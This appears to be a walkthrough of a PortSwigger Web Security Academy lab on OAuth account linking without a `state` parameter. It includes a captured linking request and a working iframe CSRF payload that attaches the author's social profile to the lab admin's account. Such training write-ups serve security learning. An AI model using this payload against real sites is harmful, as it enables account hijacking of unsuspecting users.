So this time we can login with either our website credentials or use our social media. Let's login with our website credentials first.

Next, there is an option at our account to attach a social media account.
So what if we log out and log back in but this time 'Log in using Social Media.'

And we're logged back in since it is linked to our website account. Now let's see what the challenges says.
```txt
Consider a website that allows users to log in using either a classic, password-based mechanism or by linking their account to a social media profile using OAuth. In this case, if the application fails to use the `state` parameter, an attacker could potentially hijack a victim user's account on the client application by binding it to their own social media account.
```
Let's see if the website has a 'state' parameter using Burp.
Forwarding few request it seems like there aren't any CRSF tokens. So let's try doing this.

Let's click on attach social media account at our account and capture the request in Burp. You'll finally reach this part.
```txt
GET /oauth-linking?code=h4GW8iwncoDS0mYR1_wVL1CPCXd9ymx28pnVCP8ePZi HTTP/1.1
Host: ac441f641f907a838098994600c500ef.web-security-academy.net
Cookie: session=cktigDRuPH7D0kDV0JhwRIz7SjBrVfwV
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://ac441f641f907a838098994600c500ef.web-security-academy.net/
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Gpc: 1
Te: trailers
Connection: close
```
As you can see it's giving us a code to link our social media account to our current account that we're logged in. But since there isn't any CRSF tokens, we can use this token if we drop it. So let's drop the request so the token is not destroyed.

Let's see what the challenge says.
```txt
To solve the lab, use a [CSRF attack](https://portswigger.net/web-security/csrf) to attach your own social media profile to the admin user's account on the blog website, then access the admin panel and delete Carlos.

The admin user will open anything you send from the exploit server and they always have an active session on the blog website.
```
So looks like admins will open anything we send from the exploit server. Great.
Let's craft our payload. So let's log out first and then go to the exploit server.
Let's set our payload in body. We can't use img tag since we need to send a URL that needs to be rendered so let's use iframes.
```html
<iframe src="https://ac441f641f907a838098994600c500ef.web-security-academy.net/oauth-linking?code=h4GW8iwncoDS0mYR1_wVL1CPCXd9ymx28pnVCP8ePZi"></iframe>

```
So this iframe will render when the admin opens it and will send a request on his account to link our social media to his own. And when we log in back in to our social media account. We can see that now we have an admin panel.
